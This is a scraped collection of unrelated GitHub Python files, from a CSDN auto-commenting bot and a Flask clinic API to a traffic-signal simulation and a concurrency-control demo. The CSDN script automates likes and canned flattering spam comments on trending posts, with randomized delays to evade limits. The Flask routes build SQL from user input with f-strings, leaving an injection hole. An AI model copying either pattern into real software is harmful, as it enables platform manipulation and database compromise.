(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\",\n \"Host\": \"blog.csdn.net\"\n }\ndef write_commented_url(url,path = 'commented_url.txt'):\n f = open(path,'a+')\n f.write(url+'\\n')\n f.close()\ndef get_commented_url(path = 'commented_url.txt'):\n commented_url = [] # 已经评论的文章,最好不要二次评论\n f = open(path,'r')\n url_list = f.readlines()\n print(url_list)\n for 
url in url_list:\n url = url.replace('\\n','')\n commented_url.append(url)\n f.close()\n return commented_url\ndef get_url1(start_page = 0,end_page = 50):\n params = {\n \"page\": str(start_page),\n # 可以修改pageSize的值\n \"pageSize\": str(end_page),\n # \"child_channel\":\n }\n # topics = [\"c/c++\",\"java\",\"javascript\",\"php\",\"python\",\"人工智能\",\"区块链\",\n # \"大数据\",\"移动开发\",\"嵌入式\",\"开发工具\",\"数据结构与算法\",\"测试\",\"游戏\",\"网络\",\"运维\"]\n topics = [\"c/c++\",\"python\",\"人工智能\",\"大数据\",\"数据结构与算法\",\"区块链\",\"javascript\",\"开发工具\"]\n topics = [\"c/c++\", \"python\", \"人工智能\", \"大数据\"]\n # params[\"child_channel\"] = random.choice(topics)\n # print(params)\n url_set = set('')\n all_url = \"https://blog.csdn.net/phoenix/web/blog/hotRank/\" # 领域内容榜\n for topic in topics:\n params[\"child_channel\"] = topic\n # print(params)\n r = requests.get(all_url, headers=headers, params=params)\n # print(r.text)\n # print(loads(r.text))\n datas = loads(r.text)[\"data\"]\n # print(datas)\n\n print(\"---------- 这次领域内容榜的主题是\" + params['child_channel']+\"----------\")\n\n for data in datas:\n url = data[\"articleDetailUrl\"]\n # print(data[\"nickName\"],\n # data[\"articleTitle\"],\n # url,\n # \"热度为\" + data[\"pcHotRankScore\"]\n # )\n # url_list.append(url)\n url_set.add(url)\n print(\"---------- 领域内容榜的主题\" + params['child_channel'] + \"爬取完毕----------\")\n print(\"\\n\\n\")\n return url_set\ndef get_url2(start_page = 0,end_page = 50):\n params = {\n \"page\": str(start_page),\n # 可以修改pageSize的值\n \"pageSize\": str(end_page),\n }\n url_set = set('')\n all_url = \"https://blog.csdn.net/phoenix/web/blog/hotRank/\" # 领域内容榜\n r = requests.get(all_url, headers=headers, params=params)\n datas = loads(r.text)[\"data\"]\n\n print(\"---------- 正在爬取全站综合热榜 ----------\")\n for data in datas:\n url = data[\"articleDetailUrl\"]\n url_set.add(url)\n print(\"---------- 全站综合热榜爬取完毕 ----------\")\n print(\"\\n\\n\")\n return url_set\ndef comment_blog(comments,url_set,commented_url,total = 0, end = 100):\n chrome_options = Options()\n chrome_options.add_experimental_option(\"debuggerAddress\", \"127.0.0.1:9999\")\n driver = webdriver.Chrome(options=chrome_options,executable_path='C:/bin/chromedriver.exe')\n # driver.get(\"https://www.baidu.com/\")\n print(driver.title)\n for url in url_set:\n if url not in commented_url:\n comment = random.choice(comments)\n driver.get(url)\n try:\n driver.find_element_by_id('is-like-imgactive').click() # 点赞\n except:\n driver.find_element_by_id('is-like-img').click()\n driver.find_element_by_id('comment_content').clear() # 找到评论框\n driver.find_element_by_id('comment_content').send_keys(comment) # 加载评论\n time.sleep(3)\n try:\n driver.find_element_by_css_selector(\"[class='btn btn-sm btn-comment']\").click() # 点击评论\n except:\n driver.find_element_by_css_selector(\"[class='bt-comment-show']\").click()\n finally:\n print(url + ' 已经评论和点赞','评论的内容是: ' + comment)\n write_commented_url(url)\n total += 1\n if total % 10 == 0:\n print('已经评论了 {} 篇文章'.format(total))\n if total == end:\n print('今天评论上限,请试后再确定是否继续评论')\n break\n if total % 20 == 0:\n time.sleep(1800)\n elif total % 50 == 0:\n time.sleep(2700)\n else:\n using_time = random.randint(120,360)\n time.sleep(using_time)\n # time.sleep(5)\n driver.quit()\n\n\ndef main():\n # url = 'https://blog.csdn.net/KIK9973'\n # blog_url = get_blog_url_list(url)\n # print(blog_url)\n # url_set = set(blog_url)\n url_set1 = get_url1(start_page= 0,end_page= 30)\n url_set2 = get_url2(start_page = 0,end_page = 30)\n url_set = ('')\n url_set = url_set1 | url_set2\n 
print(\"这次爬取到的评论的网站个数为\",len(url_set))\n commented_url = get_commented_url()\n # return\n comments = ['好文,受益匪浅,点赞支持,欢迎回访!',\n '太精辟了啊,竖起我的大拇指!希望互相关注一波!',\n '点赞博主文章,大佬牛批,写的很详细,欢迎回访',\n '内容详细,结构清晰,学到了,欢迎回访哦!',\n '学习佳作,顺手点赞与关住,期待大佬回访!',\n '不错的文章,受益匪浅,欢迎回访',\n '写的好,很nice,期待大佬回访!',\n '支持大佬,原创不易,欢迎回访',\n '期待你更多好的作品,加油哦',\n '太精辟了啊,竖起我的大拇指!希望互相关注一波!',\n '好文,支持大佬,期待大佬也来指点一下我的博文。',\n '好文,已收藏,大佬分析的很到位,明白了很多,大赞!( ̄ˇ ̄),大佬有兴趣也可以看下我的博客哈',\n '博主写的非常清晰啊,对我很有帮助,谢谢啦,我也写了一些,欢迎回访',\n '膜拜大佬的技术,来我博客指点江山吧!',\n '写的真清晰,学到了,我也有一些好文章,欢迎回访',\n '给大佬递茶祝上热榜 以三连 望回访',\n ]\n\n comment_blog(comments,url_set,commented_url,0,100)\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Kedreamix/fun_spider","sub_path":"CSDN/commentCSDN.py","file_name":"commentCSDN.py","file_ext":"py","file_size_in_byte":8113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73725442794","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def __init__(self):\n self.flag=True\n def isBalanced(self, root: Optional[TreeNode]) -> bool:\n if root:\n self.dfs(root)\n return self.flag\n\n def dfs(self,root):\n if not root:\n return 0\n if not self.flag:\n return 0\n right=self.dfs(root.right)\n left=self.dfs(root.left)\n if (abs(right-left)>1):\n self.flag=False\n return 1+max(right,left)","repo_name":"haydentinker/LeetCode","sub_path":"0110-balanced-binary-tree/0110-balanced-binary-tree.py","file_name":"0110-balanced-binary-tree.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74916423592","text":"import os\n\nfrom devdeck_core.decks.deck_controller import DeckController\nfrom slack_sdk import WebClient\n\nfrom devdeck_slack.slack_away_control import SlackAwayControl\nfrom devdeck_slack.slack_dnd_control import SlackDndControl\nfrom devdeck_slack.slack_online_control import SlackOnlineControl\nfrom devdeck_slack.slack_status_control import SlackStatusControl\n\n\nclass SlackDeck(DeckController):\n def __init__(self, key_no, **kwargs):\n self.actions = {\n 'online': SlackOnlineControl,\n 'away': SlackAwayControl,\n 'status': SlackStatusControl,\n 'dnd': SlackDndControl\n }\n super().__init__(key_no, **kwargs)\n\n def initialize(self):\n with self.deck_context() as context:\n with context.renderer() as r:\n r.image(os.path.join(os.path.join(os.path.dirname(__file__), \"assets\", 'slack.png'))).end()\n\n def deck_controls(self):\n api_client = WebClient(token=self.settings['api_key'])\n\n for action_setting in self.settings['actions']:\n action_control_class = self.actions[action_setting['action']]\n\n control_settings = dict(action_setting)\n del control_settings['action']\n del control_settings['key']\n self.register_control(action_setting['key'], action_control_class, api_client=api_client, **control_settings)\n\n def settings_schema(self):\n return {\n 'api_key': {\n 'type': 'string',\n 'required': True,\n },\n 'actions': {\n 'type': 'list',\n 'required': True,\n 'schema': {\n 'type': 'dict',\n 'schema': {\n 'action': {\n 'type': 'string',\n 'required': True\n },\n 'key': {\n 'type': 'integer',\n 'required': True\n },\n 'text': {\n 'type': 'string',\n 'required': False\n },\n 'emoji': {\n 'type': 'string',\n 'required': False\n },\n 'emoji_slack': {\n 'type': 'string',\n 'required': False\n },\n 'dnd': {\n 'type': 'boolean',\n 'required': 
False,\n 'excludes': 'clear_dnd'\n },\n 'clear_dnd': {\n 'type': 'boolean',\n 'required': False,\n 'excludes': 'dnd'\n },\n 'duration': {\n 'type': 'integer',\n 'min': 1,\n 'required': False,\n 'excludes': 'until',\n },\n 'until': {\n 'type': 'string',\n 'required': False,\n 'excludes': 'duration'\n }\n }\n }\n },\n }\n","repo_name":"jamesridgway/devdeck-slack","sub_path":"devdeck_slack/slack_deck.py","file_name":"slack_deck.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"72"} +{"seq_id":"266276843","text":"from api_base.services import BaseService\nfrom api_user.constants import Roles\nfrom api_user.models import Account, User\n\n\nclass AccountService(BaseService):\n @classmethod\n def login_with_google(cls, account_obj, profile_obj):\n created_account = Account.objects.filter(email=account_obj['email'])\n if not created_account:\n account = Account.objects.create(**account_obj)\n profile_obj.update({\n 'account_id': account.id,\n 'role': Roles.USER.value,\n })\n return User.objects.create(**profile_obj)\n else:\n created_account.update(google_login=True)\n return User.objects.get_or_create(**profile_obj)[0]\n\n @classmethod\n def create_user(cls, validated_data):\n account = dict({\n 'password': validated_data.pop('password'),\n 'email': validated_data.pop('email')\n })\n account = Account.objects.filter(email=account['email']).update(**account)\n validated_data.update({'account': account})\n return User.objects.get_or_create(**validated_data)[0]\n","repo_name":"huong10102001/DUTOnlineCourseSystem","sub_path":"src/backend/api_auth/services/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30309837750","text":"from flask import Blueprint, request, jsonify, make_response, current_app\nimport json\nfrom src import db\n\n\ndoctors = Blueprint('doctors', __name__)\n\n# Get all patients\n@doctors.route('/patients/', methods=['GET'])\ndef get_patients(var):\n cursor = db.get_db().cursor()\n cursor.execute(f'select * from Patient where PrimaryDoctor = {var}')\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_headers, row)))\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n# Add a new patient in the dataset\n@doctors.route('/new_patient/', methods = ['POST'])\ndef add_patient(doc_id):\n current_app.logger.info(request.form)\n cursor = db.get_db().cursor()\n name = request.form['name']\n dob = request.form['dob']\n address = request.form['address']\n city = request.form['city']\n state = request.form['state']\n zip = request.form['zip']\n email = request.form['email']\n phone = request.form['phone']\n query = f'INSERT INTO Patient(Name, DOB, Address, City, State, ZipCode, Email, PhoneNumber, PrimaryDoctor) VALUES (\\\"{name}\\\", \\\"{dob}\\\", \\\"{address}\\\", \\\"{city}\\\", \\\"{state}\\\", \\\"{zip}\\\", \\\"{email}\\\", \\\"{phone}\\\", {doc_id})'\n cursor.execute(query)\n db.get_db().commit()\n return 'Success!'\n\n# Get the doctors name for the dropdown menu\n@doctors.route('get_doc_info', methods = ['GET'])\ndef get_doc_info():\n current_app.logger.info(request.form)\n cursor = db.get_db().cursor()\n cursor.execute('select Doctor_ID as value, Name as label 
from Doctor')\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_headers, row)))\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n# Add a new prescription in the dataset\n@doctors.route('/new_prescription', methods = ['POST'])\ndef add_prescription():\n current_app.logger.info(request.form)\n cursor = db.get_db().cursor()\n Patient_ID = request.form['Patient_ID']\n NDC_Code = request.form['NDC_Code']\n RefillNumber = request.form['RefillNumber']\n query = f'INSERT INTO Prescription(Patient_ID, NDC_Code, RefillNumber) VALUES (\\\"{Patient_ID}\\\", \\\"{NDC_Code}\\\", \\\"{RefillNumber}\\\")'\n cursor.execute(query)\n db.get_db().commit()\n return 'Success!'","repo_name":"johnmccarthy23/UltraHealth","sub_path":"flask-app/src/doctors/doctors.py","file_name":"doctors.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29384924287","text":"# Import dependencies.\n\n# Import own module\nfrom database import *\nfrom transaction import *\nclass TransactionExecutor:\n \"\"\"\n Class that execute and validate OCC transaction in serial way.\n\n Attributes:\n \n \"\"\"\n def __init__(self, db:'SerialDatabase', transaction:Transaction) -> None:\n \"\"\"\n Constructor of the TransactionExecutor.\n\n Parameters:\n -----------\n db: SerialDatabase\n the local database\n transaction: Transaction\n The transaction to be executed.\n \"\"\"\n self.db = db\n self.transaction = transaction\n\n def readingPhase(self) -> None:\n \"\"\"\n Execute the reading phase of OCC transaction.\n \"\"\"\n # Read the database\n self.transaction.execute()\n \n def validationAndWritingPhase(self) -> bool:\n \"\"\"\n Execute the validation and writing phase of OCC transaction.\n \"\"\"\n last_commit_timestamp = self.db.last_commit_timestamp\n # Check for all the transactions that are commited after the current transaction start.\n for timestamp in range(self.transaction.start_timestamp+1, last_commit_timestamp + 1):\n # Get the transaction local database that is commited at that timestamp. \n if (self.db.transactions[timestamp] is not None):\n cached_db = self.db.transactions[timestamp].local_db\n # Validate with current transaction execution.\n # If conflict then rollback the transaction and return False.\n write_set = cached_db.write_set\n read_set = self.transaction.local_db.read_set\n if not write_set.isdisjoint(read_set):\n print(\"Conflict detected write set: \", write_set,\" read set: \", read_set, \n \"at timestamp \", timestamp, \"between transaction no-\",self.db.transactions[timestamp].number ,\n \" and transaction no-\", self.transaction.number )\n return False\n # If not conflict then commit the transaction and add to transaction manager.\n self.writingPhase()\n print(\"No conflict detected. 
Transaction\", self.transaction.number,\"commited.\")\n return True\n \n def writingPhase(self) -> None:\n \"\"\"\n Execute the writing phase of OCC transaction.\n \"\"\"\n self.transaction.local_db.commit()\n self.db.commitTransaction(self.transaction)\n\n\nclass SerialDatabase(Database):\n \"\"\"\n Class that manage OCC transaction execution.\n\n Attributes:\n -----------\n data: Database\n The database that is used for the transaction.\n transactions : Dict[int, Transaction]\n A dictionary that contains all the commited transactions that are currently in the transaction manager\n last_commit_timestamp : int\n The timestamp of the last commit.\n \"\"\"\n def __init__(self) -> None:\n \"\"\"\n Constructor of the SerialDatabase.\n \"\"\"\n super().__init__()\n self.transactions: Dict[int, Transaction] = {}\n self.last_commit_timestamp: int = 0\n \n def commitTransaction(self, transaction: Transaction) -> None:\n \"\"\"\n Commit a transaction.\n\n Parameters:\n -----------\n transaction: Transaction\n The transaction to be committed.\n \"\"\"\n self.last_commit_timestamp += 1\n if (self.last_commit_timestamp in self.transactions):\n raise Exception(\"There are a transaction commited at that timestamp\")\n self.transactions[self.last_commit_timestamp] = transaction\n transaction.local_db.commit()\n \n def begin(self, transaction: Transaction) -> TransactionExecutor:\n \"\"\"\n Begin a transaction.\n \n Parameters:\n -----------\n transaction: Transaction\n The transaction to be executed.\n \"\"\"\n return TransactionExecutor(self, transaction)\n\ndef main():\n occ = SerialDatabase()\n assert(occ.database == {})\n\n # Fill data/database with dummy value 0. \n t0_txn = fill_txn(['a','b','c'])\n t0 = occ.begin(Transaction(occ, t0_txn, 0, 0))\n t0.readingPhase()\n assert(t0.validationAndWritingPhase())\n assert(occ.database == {'a': 0, 'b': 0, 'c': 0})\n assert(occ.last_commit_timestamp == 1)\n\n # Read data using two concurrent transactions.\n # Must be not conflict.\n t1_txn = read_txn(['a','b','c'])\n t2_txn = read_txn(['a','b','c'])\n t1 = occ.begin(Transaction(occ, t1_txn, 1, 1))\n t2 = occ.begin(Transaction(occ, t2_txn, 2, 1))\n t1.readingPhase()\n t2.readingPhase()\n assert(t1.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 2)\n assert(t2.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 3)\n\n # Write data using two concurrent transactions.\n # Must be conflict.\n t3_txn = write_txn(['a','b','c'])\n t4_txn = write_txn(['a','b','c'])\n t3 = occ.begin(Transaction(occ, t3_txn, 3, 3))\n t4 = occ.begin(Transaction(occ, t4_txn, 4, 3))\n t3.readingPhase()\n t4.readingPhase()\n assert(t3.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 4)\n assert(not t4.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 4)\n\n # Disjoin write set of two concurrent transactions.\n # Must be not conflict.\n t5_txn = write_txn(['a','b'])\n t6_txn = write_txn(['c'])\n t5 = occ.begin(Transaction(occ, t5_txn, 5, 4))\n t6 = occ.begin(Transaction(occ, t6_txn, 6, 4))\n t5.readingPhase()\n t6.readingPhase()\n assert(t5.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 5)\n assert(t6.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 6)\n\n # Write data using two concurrent transactions.\n # Must be conflict.\n t7_txn = write_txn(['a','b', 'c'])\n t8_txn = write_txn(['a'])\n t7 = occ.begin(Transaction(occ, t7_txn, 7, 6))\n t8 = occ.begin(Transaction(occ, t8_txn, 8, 6))\n t7.readingPhase()\n t8.readingPhase()\n 
assert(t7.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 7)\n assert(not t8.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 7)\n\n # Write and read data using two concurrent transactions.\n # Must be conflict.\n t9_txn = write_txn(['a','b', 'c'])\n t10_txn = read_txn(['a'])\n t9 = occ.begin(Transaction(occ, t9_txn, 9, 7))\n t10 = occ.begin(Transaction(occ, t10_txn, 10, 7))\n t9.readingPhase()\n t10.readingPhase()\n assert(t9.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 8)\n assert(not t10.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 8)\n\n # Read and write data using two concurrent transactions.\n # Must be not conflict.\n t11_txn = read_txn(['a','b', 'c'])\n t12_txn = write_txn(['a','b', 'c'])\n t11 = occ.begin(Transaction(occ, t11_txn, 11, 8))\n t12 = occ.begin(Transaction(occ, t12_txn, 12, 8))\n t11.readingPhase()\n t12.readingPhase()\n assert(t11.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 9)\n assert(t12.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 10)\n\n # Disjoint write and read data using two concurrent transactions.\n # Must be not conflict.\n t13_txn = write_txn(['a'])\n t14_txn = read_txn(['b'])\n t13 = occ.begin(Transaction(occ, t13_txn, 13, 10))\n t14 = occ.begin(Transaction(occ, t14_txn, 14, 10))\n t13.readingPhase()\n t14.readingPhase()\n assert(t13.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 11)\n assert(t14.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 12)\n\nif __name__ == \"__main__\":\n main()","repo_name":"AndhikaRei/Serial-Optimistic-Concurrency-Control","sub_path":"occ.py","file_name":"occ.py","file_ext":"py","file_size_in_byte":7731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18169090515","text":"# coding: utf-8\n\n# Python imports\nfrom datetime import timedelta\n\n# Django imports\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db.models.aggregates import Count\nfrom django.utils import timezone\nfrom django.db.transaction import atomic\n\n# MAGE imports\nfrom scm.models import BackupSet\n\n\n@atomic\nclass Command(BaseCommand):\n args = ''\n help = 'Purges old archived backupsets from the database. 
Sets that were used for at least one restoration are left untouched.'\n\n def handle(self, *args, **options):\n if len(args) != 1:\n raise CommandError('no parameter specified')\n try:\n days = int(args[0])\n except:\n raise CommandError('parameter should be an integer')\n \n limit = timezone.now() - timedelta(days=days)\n init = BackupSet.objects.filter(removed__isnull=False).count()\n \n # do a loop - SQLite limitation that is only overcome in Django 1.8 - https://code.djangoproject.com/ticket/16426\n for bs in BackupSet.objects.filter(removed__isnull=False, set_date__lte=limit).annotate(installs=Count('installation')).filter(installs=0):\n bs.delete() \n \n print(\"%s backupsets purged\" %(init - BackupSet.objects.filter(removed__isnull=False).count()))\n","repo_name":"marcanpilami/MAGE","sub_path":"scm/management/commands/purgeoldbackups.py","file_name":"purgeoldbackups.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"23308811471","text":"import traci\nimport numpy as np\nimport random\nimport timeit\nimport os\n\n# phase codes based on environment.net.xml\nPHASE_NS_GREEN = 0 # action 0 code 00\nPHASE_NS_YELLOW = 1\nPHASE_NSL_GREEN = 2 # action 1 code 01\nPHASE_NSL_YELLOW = 3\nPHASE_EW_GREEN = 4 # action 2 code 10\nPHASE_EW_YELLOW = 5\nPHASE_EWL_GREEN = 6 # action 3 code 11\nPHASE_EWL_YELLOW = 7\n\n\nclass Simulation:\n def __init__(self, Model, TrafficGen, sumo_cmd, max_steps, green_duration, yellow_duration, num_states, num_actions):\n self._Model = Model\n self._TrafficGen = TrafficGen\n self._step = 0\n self._sumo_cmd = sumo_cmd\n self._max_steps = max_steps\n self._green_duration = green_duration\n self._yellow_duration = yellow_duration\n self._num_states = num_states\n self._num_actions = num_actions\n self._reward_episode = []\n self._queue_length_episode = []\n\n\n def run(self, episode):\n \"\"\"\n Runs the testing simulation\n \"\"\"\n start_time = timeit.default_timer()\n\n # first, generate the route file for this simulation and set up sumo\n self._TrafficGen.generate_routefile(seed=episode)\n traci.start(self._sumo_cmd)\n print(\"Simulating...\")\n\n # inits\n self._step = 0\n self._waiting_times = {}\n old_total_wait = 0\n old_action = -1 # dummy init\n\n while self._step < self._max_steps:\n\n # get current state of the intersection\n current_state = self._get_state()\n\n # calculate reward of previous action: (change in cumulative waiting time between actions)\n # waiting time = seconds waited by a car since the spawn in the environment, cumulated for every car in incoming lanes\n current_total_wait = self._collect_waiting_times()\n reward = old_total_wait - current_total_wait\n\n # choose the light phase to activate, based on the current state of the intersection\n action = self._choose_action(current_state)\n\n # if the chosen phase is different from the last phase, activate the yellow phase\n if self._step != 0 and old_action != action:\n self._set_yellow_phase(old_action)\n self._simulate(self._yellow_duration)\n\n # execute the phase selected before\n self._set_green_phase(action)\n self._simulate(self._green_duration)\n\n # saving variables for later & accumulate reward\n old_action = action\n old_total_wait = current_total_wait\n\n self._reward_episode.append(reward)\n\n #print(\"Total reward:\", np.sum(self._reward_episode))\n traci.close()\n simulation_time = round(timeit.default_timer() - start_time, 1)\n\n return simulation_time\n\n\n def 
_simulate(self, steps_todo):\n \"\"\"\n Proceed with the simulation in sumo\n \"\"\"\n if (self._step + steps_todo) >= self._max_steps: # do not do more steps than the maximum allowed number of steps\n steps_todo = self._max_steps - self._step\n\n while steps_todo > 0:\n traci.simulationStep() # simulate 1 step in sumo\n self._step += 1 # update the step counter\n steps_todo -= 1\n queue_length = self._get_queue_length() \n self._queue_length_episode.append(queue_length)\n\n\n def _collect_waiting_times(self):\n \"\"\"\n Retrieve the waiting time of every car in the incoming roads\n \"\"\"\n incoming_roads = [\"E2TL\", \"N2TL\", \"W2TL\", \"S2TL\"]\n car_list = traci.vehicle.getIDList()\n for car_id in car_list:\n wait_time = traci.vehicle.getAccumulatedWaitingTime(car_id)\n road_id = traci.vehicle.getRoadID(car_id) # get the road id where the car is located\n if road_id in incoming_roads: # consider only the waiting times of cars in incoming roads\n self._waiting_times[car_id] = wait_time\n else:\n if car_id in self._waiting_times: # a car that was tracked has cleared the intersection\n del self._waiting_times[car_id] \n total_waiting_time = sum(self._waiting_times.values())\n return total_waiting_time\n\n\n def _choose_action(self, state):\n \"\"\"\n Pick the best action known based on the current state of the env\n \"\"\"\n return np.argmax(self._Model.predict_one(state))\n\n\n def _set_yellow_phase(self, old_action):\n \"\"\"\n Activate the correct yellow light combination in sumo\n \"\"\"\n yellow_phase_code = old_action * 2 + 1 # obtain the yellow phase code, based on the old action (ref on environment.net.xml)\n traci.trafficlight.setPhase(\"TL\", yellow_phase_code)\n\n\n def _set_green_phase(self, action_number):\n \"\"\"\n Activate the correct green light combination in sumo\n \"\"\"\n\n\n if action_number == 0:\n traci.trafficlight.setPhase(\"TL\", PHASE_NS_GREEN)\n elif action_number == 1:\n traci.trafficlight.setPhase(\"TL\", PHASE_NSL_GREEN)\n elif action_number == 2:\n traci.trafficlight.setPhase(\"TL\", PHASE_EW_GREEN)\n elif action_number == 3:\n traci.trafficlight.setPhase(\"TL\", PHASE_EWL_GREEN)\n\n\n def _get_queue_length(self):\n \"\"\"\n Retrieve the number of cars with speed = 0 in every incoming lane\n \"\"\"\n halt_N = traci.edge.getLastStepHaltingNumber(\"N2TL\")\n halt_S = traci.edge.getLastStepHaltingNumber(\"S2TL\")\n halt_E = traci.edge.getLastStepHaltingNumber(\"E2TL\")\n halt_W = traci.edge.getLastStepHaltingNumber(\"W2TL\")\n queue_length = halt_N + halt_S + halt_E + halt_W\n return queue_length\n\n\n def _get_state(self):\n \"\"\"\n Retrieve the state of the intersection from sumo, in the form of cell occupancy\n \"\"\"\n state = np.zeros(self._num_states)\n car_list = traci.vehicle.getIDList()\n\n for car_id in car_list:\n lane_pos = traci.vehicle.getLanePosition(car_id)\n lane_id = traci.vehicle.getLaneID(car_id)\n lane_pos = 750 - lane_pos # inversion of lane pos, so if the car is close to the traffic light -> lane_pos = 0 --- 750 = max len of a road\n\n # distance in meters from the traffic light -> mapping into cells\n if lane_pos < 7:\n lane_cell = 0\n elif lane_pos < 14:\n lane_cell = 1\n elif lane_pos < 21:\n lane_cell = 2\n elif lane_pos < 28:\n lane_cell = 3\n elif lane_pos < 40:\n lane_cell = 4\n elif lane_pos < 60:\n lane_cell = 5\n elif lane_pos < 100:\n lane_cell = 6\n elif lane_pos < 160:\n lane_cell = 7\n elif lane_pos < 400:\n lane_cell = 8\n elif lane_pos <= 750:\n lane_cell = 9\n\n # finding the lane where the car is located \n # x2TL_3 
are the \"turn left only\" lanes\n if lane_id == \"W2TL_0\" or lane_id == \"W2TL_1\" or lane_id == \"W2TL_2\":\n lane_group = 0\n elif lane_id == \"W2TL_3\":\n lane_group = 1\n elif lane_id == \"N2TL_0\" or lane_id == \"N2TL_1\" or lane_id == \"N2TL_2\":\n lane_group = 2\n elif lane_id == \"N2TL_3\":\n lane_group = 3\n elif lane_id == \"E2TL_0\" or lane_id == \"E2TL_1\" or lane_id == \"E2TL_2\":\n lane_group = 4\n elif lane_id == \"E2TL_3\":\n lane_group = 5\n elif lane_id == \"S2TL_0\" or lane_id == \"S2TL_1\" or lane_id == \"S2TL_2\":\n lane_group = 6\n elif lane_id == \"S2TL_3\":\n lane_group = 7\n else:\n lane_group = -1\n\n if lane_group >= 1 and lane_group <= 7:\n car_position = int(str(lane_group) + str(lane_cell)) # composition of the two postion ID to create a number in interval 0-79\n valid_car = True\n elif lane_group == 0:\n car_position = lane_cell\n valid_car = True\n else:\n valid_car = False # flag for not detecting cars crossing the intersection or driving away from it\n\n if valid_car:\n state[car_position] = 1 # write the position of the car car_id in the state array in the form of \"cell occupied\"\n\n return state\n\n\n @property\n def queue_length_episode(self):\n return self._queue_length_episode\n\n\n @property\n def reward_episode(self):\n return self._reward_episode\n\n\n\n","repo_name":"AndreaVidali/Deep-QLearning-Agent-for-Traffic-Signal-Control","sub_path":"TLCS/testing_simulation.py","file_name":"testing_simulation.py","file_ext":"py","file_size_in_byte":8692,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"72"} +{"seq_id":"30978649752","text":"# ideas taken from\r\n# docs.python.org/3/library/sqllite3/sqllite3.html\r\n# and pythoncentral.io/introduction-to-sqlite-in-python\r\nimport sqlite3\r\nfrom tkinter import *\r\nimport datetime\r\n\r\nconn = sqlite3.connect('stock_trader.db')\r\nc = conn.cursor()\r\n\r\ndef table_exists(table):\r\n sql = f\"SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='{table}'\"\r\n # print(sql)\r\n tab = c.execute(sql)\r\n for num in tab:\r\n if num[0] == 1:\r\n return True\r\n else:\r\n return False\r\n\r\n# Test table existences\r\nstock = table_exists(\"stocks\")\r\npeople = table_exists(\"people\")\r\ntrans = table_exists(\"trans\")\r\n\r\n# Create tables and test records (rows of data) as required\r\nif stock==False:\r\n c.execute('''CREATE TABLE if NOT EXISTS stocks\r\n (id INTEGER PRIMARY KEY, company text, qty real, price real)''')\r\n c.execute(\"INSERT INTO stocks(company, qty, price) VALUES('Thames',100,3.142)\")\r\n c.execute(\"INSERT INTO stocks(company, qty, price) VALUES('Roding',100,2.718)\")\r\n c.execute(\"INSERT INTO stocks(company, qty, price) VALUES('Canterbury',100,4)\")\r\n c.execute(\"INSERT INTO stocks(company, qty, price) VALUES('Winchester',100,5)\")\r\n c.execute(\"INSERT INTO stocks(company, qty, price) VALUES('Rochester',100,6)\")\r\nif people==False:\r\n c.execute('''CREATE TABLE if NOT EXISTS people\r\n (id INTEGER PRIMARY KEY, name text)''')\r\n c.execute(\"INSERT INTO people(name) VALUES('s1')\")\r\n c.execute(\"INSERT INTO people(name) VALUES('s2')\")\r\n c.execute(\"INSERT INTO people(name) VALUES('s3')\")\r\nif trans==False:\r\n c.execute('''CREATE TABLE if NOT EXISTS trans\r\n (id INTEGER PRIMARY KEY, date text, qty real, price real,\r\n stock_id INTEGER FORIEGN KEY REFERENCES stocks(id), people_id INTEGER FORIEGN KEY REFERENCES people(id))''')\r\n sql = \"INSERT INTO trans(date,qty,price,stock_id,people_id) 
